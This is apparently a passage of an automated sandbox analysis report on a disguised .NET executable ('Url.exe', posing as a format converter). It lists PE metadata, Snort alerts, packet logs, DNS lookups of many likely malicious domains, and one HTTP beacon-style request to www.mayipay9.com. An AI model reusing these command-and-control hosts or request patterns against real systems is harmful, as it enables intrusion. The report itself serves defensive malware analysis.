                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x832800x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x614.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x812d80x81400False0.901811079545data7.85500503575IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x840000x6140x800False0.3359375data3.43679274564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_VERSION0x840900x384data
                                                                                RT_MANIFEST0x844240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0000 0x04b0
                                                                                LegalCopyrightCopyright 2018
                                                                                Assembly Version1.0.0.0
                                                                                InternalNameUrl.exe
                                                                                FileVersion1.0.0.0
                                                                                CompanyNameBobbleSoft
                                                                                LegalTrademarks
                                                                                CommentsConverts one textual format to another.
                                                                                ProductNameFormat Converter
                                                                                ProductVersion1.0.0.0
                                                                                FileDescriptionFormat Converter
                                                                                OriginalFilenameUrl.exe

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                04/08/21-13:33:30.395435TCP1201ATTACK-RESPONSES 403 Forbidden804971234.102.136.180192.168.2.5
                                                                                04/08/21-13:33:35.569008TCP1201ATTACK-RESPONSES 403 Forbidden804971334.102.136.180192.168.2.5

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 8, 2021 13:33:30.258059025 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.270374060 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.270483017 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.270664930 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.282777071 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.395435095 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.395462036 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.395627022 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.395771980 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.410864115 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.441595078 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.454417944 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.454521894 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.454659939 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.467411995 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.569008112 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.569031000 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.569360971 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.569529057 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.582372904 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:40.936160088 CEST4971680192.168.2.5198.54.117.218
                                                                                Apr 8, 2021 13:33:41.110282898 CEST8049716198.54.117.218192.168.2.5
                                                                                Apr 8, 2021 13:33:41.110400915 CEST4971680192.168.2.5198.54.117.218
                                                                                Apr 8, 2021 13:33:41.110529900 CEST4971680192.168.2.5198.54.117.218
                                                                                Apr 8, 2021 13:33:41.284627914 CEST8049716198.54.117.218192.168.2.5
                                                                                Apr 8, 2021 13:33:41.284666061 CEST8049716198.54.117.218192.168.2.5
                                                                                Apr 8, 2021 13:33:46.447664022 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.474776030 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.474947929 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.475327969 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.502770901 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.528913975 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.529126883 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.529169083 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.529215097 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.561122894 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:51.594780922 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.644813061 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:33:51.644915104 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.645071030 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.695214033 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:33:51.695235968 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:33:51.695450068 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.695672035 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.744688988 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:34:01.859214067 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.044053078 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.044210911 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.044403076 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.228183985 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.446372032 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.446496964 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.446574926 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.446635962 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.630485058 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:23.094430923 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.127862930 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.127980947 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.128309011 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.162100077 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.162314892 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.162336111 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.162478924 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.162554026 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.196173906 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:28.200548887 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.231518984 CEST8049729160.153.136.3192.168.2.5
                                                                                Apr 8, 2021 13:34:28.231622934 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.232156038 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.263297081 CEST8049729160.153.136.3192.168.2.5
                                                                                Apr 8, 2021 13:34:28.263442993 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.263508081 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.295006037 CEST8049729160.153.136.3192.168.2.5
                                                                                Apr 8, 2021 13:34:33.950870037 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.094578981 CEST8049730209.99.40.222192.168.2.5
                                                                                Apr 8, 2021 13:34:34.094669104 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.094811916 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.238534927 CEST8049730209.99.40.222192.168.2.5
                                                                                Apr 8, 2021 13:34:34.314126968 CEST8049730209.99.40.222192.168.2.5
                                                                                Apr 8, 2021 13:34:34.314306974 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.314363003 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.460891962 CEST8049730209.99.40.222192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 8, 2021 13:32:22.833081961 CEST5221253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:22.846518040 CEST53522128.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:22.996326923 CEST5430253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:23.008068085 CEST53543028.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:23.306230068 CEST5378453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:23.318253040 CEST53537848.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:23.933686018 CEST6530753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:23.946712017 CEST53653078.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:25.813678980 CEST6434453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:25.826666117 CEST53643448.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:25.913069963 CEST6206053192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:25.931328058 CEST53620608.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:27.814912081 CEST6180553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:27.827399969 CEST53618058.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:31.728974104 CEST5479553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:31.741303921 CEST53547958.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:32.897629023 CEST4955753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:32.911175013 CEST53495578.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:34.201644897 CEST6173353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:34.215279102 CEST53617338.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:40.029289961 CEST6544753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:40.042716026 CEST53654478.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:40.800424099 CEST5244153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:40.812822104 CEST53524418.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:43.518765926 CEST6217653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:43.531644106 CEST53621768.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:44.282016039 CEST5959653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:44.294867992 CEST53595968.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:52.887798071 CEST6529653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:52.906302929 CEST53652968.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:00.137336969 CEST6318353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:00.149841070 CEST53631838.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:17.721121073 CEST6015153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:17.739259005 CEST53601518.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:17.945380926 CEST5696953192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:17.963702917 CEST53569698.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:30.210724115 CEST5516153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:30.246296883 CEST53551618.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:35.405210018 CEST5475753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:35.440232038 CEST53547578.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:38.592920065 CEST4999253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:38.604931116 CEST53499928.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:40.915441036 CEST6007553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:40.935023069 CEST53600758.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:45.830955029 CEST5501653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:45.849416018 CEST53550168.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:46.397650003 CEST6434553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:46.444155931 CEST53643458.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:51.550884008 CEST5712853192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:51.593406916 CEST53571288.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:01.743119001 CEST5479153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:01.857958078 CEST53547918.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:04.070271015 CEST5046353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:04.096291065 CEST53504638.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:07.454755068 CEST5039453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:07.841377020 CEST53503948.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:12.860888958 CEST5853053192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:12.890397072 CEST53585308.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:13.140750885 CEST5381353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:13.164822102 CEST53538138.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:15.298439980 CEST6373253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:15.324740887 CEST53637328.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:17.937128067 CEST5734453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:17.996918917 CEST53573448.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:23.019419909 CEST5445053192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:23.092856884 CEST53544508.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:28.178893089 CEST5926153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:28.198776007 CEST53592618.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:33.301706076 CEST5715153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:33.949660063 CEST53571518.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:39.329008102 CEST5941353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:39.365118027 CEST53594138.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:44.375610113 CEST6051653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:44.528567076 CEST53605168.8.8.8192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Apr 8, 2021 13:33:30.210724115 CEST192.168.2.58.8.8.80xb067Standard query (0)www.mayipay9.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:35.405210018 CEST192.168.2.58.8.8.80x9fb0Standard query (0)www.salesenablementlaunch.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.915441036 CEST192.168.2.58.8.8.80xeb20Standard query (0)www.oldschoolnews.netA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:46.397650003 CEST192.168.2.58.8.8.80x7616Standard query (0)www.aquaroyaume.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:51.550884008 CEST192.168.2.58.8.8.80xdf83Standard query (0)www.globalperfumery.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:01.743119001 CEST192.168.2.58.8.8.80x3ff5Standard query (0)www.kopebitest.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:07.454755068 CEST192.168.2.58.8.8.80x3d43Standard query (0)www.qingniang.clubA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:12.860888958 CEST192.168.2.58.8.8.80x187dStandard query (0)www.lattakia-imbiss.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:17.937128067 CEST192.168.2.58.8.8.80x17d2Standard query (0)www.ahaal20.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:23.019419909 CEST192.168.2.58.8.8.80xf3bcStandard query (0)www.farmacyfastfood.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:28.178893089 CEST192.168.2.58.8.8.80xe300Standard query (0)www.bigbuddyco.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:33.301706076 CEST192.168.2.58.8.8.80xa891Standard query (0)www.agarkovsport.onlineA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:39.329008102 CEST192.168.2.58.8.8.80xfaacStandard query (0)www.xiaoqiche.netA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:44.375610113 CEST192.168.2.58.8.8.80xe01dStandard query (0)www.almosting.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Apr 8, 2021 13:33:30.246296883 CEST8.8.8.8192.168.2.50xb067No error (0)www.mayipay9.commayipay9.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:33:30.246296883 CEST8.8.8.8192.168.2.50xb067No error (0)mayipay9.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:35.440232038 CEST8.8.8.8192.168.2.50x9fb0No error (0)www.salesenablementlaunch.comsalesenablementlaunch.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:33:35.440232038 CEST8.8.8.8192.168.2.50x9fb0No error (0)salesenablementlaunch.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)www.oldschoolnews.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:46.444155931 CEST8.8.8.8192.168.2.50x7616No error (0)www.aquaroyaume.com185.107.56.197A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:51.593406916 CEST8.8.8.8192.168.2.50xdf83No error (0)www.globalperfumery.com94.136.40.51A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:01.857958078 CEST8.8.8.8192.168.2.50x3ff5No error (0)www.kopebitest.comkopebitest.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:34:01.857958078 CEST8.8.8.8192.168.2.50x3ff5No error (0)kopebitest.com103.253.212.249A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:07.841377020 CEST8.8.8.8192.168.2.50x3d43Name error (3)www.qingniang.clubnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:12.890397072 CEST8.8.8.8192.168.2.50x187dName error (3)www.lattakia-imbiss.comnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:17.996918917 CEST8.8.8.8192.168.2.50x17d2Server failure (2)www.ahaal20.comnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:23.092856884 CEST8.8.8.8192.168.2.50xf3bcNo error (0)www.farmacyfastfood.com212.237.249.116A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:28.198776007 CEST8.8.8.8192.168.2.50xe300No error (0)www.bigbuddyco.combigbuddyco.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:34:28.198776007 CEST8.8.8.8192.168.2.50xe300No error (0)bigbuddyco.com160.153.136.3A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:33.949660063 CEST8.8.8.8192.168.2.50xa891No error (0)www.agarkovsport.online209.99.40.222A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:39.365118027 CEST8.8.8.8192.168.2.50xfaacName error (3)www.xiaoqiche.netnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:44.528567076 CEST8.8.8.8192.168.2.50xe01dNo error (0)www.almosting.comalrighting.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:34:44.528567076 CEST8.8.8.8192.168.2.50xe01dNo error (0)alrighting.xshoppy.shop75.2.113.213A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.mayipay9.com
                                                                                • www.salesenablementlaunch.com
                                                                                • www.oldschoolnews.net
                                                                                • www.aquaroyaume.com
                                                                                • www.globalperfumery.com
                                                                                • www.kopebitest.com
                                                                                • www.farmacyfastfood.com
                                                                                • www.bigbuddyco.com
                                                                                • www.agarkovsport.online

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.54971234.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:30.270664930 CEST1292OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY HTTP/1.1
                                                                                Host: www.mayipay9.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:30.395435095 CEST1293INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Thu, 08 Apr 2021 11:33:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "606abe1d-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
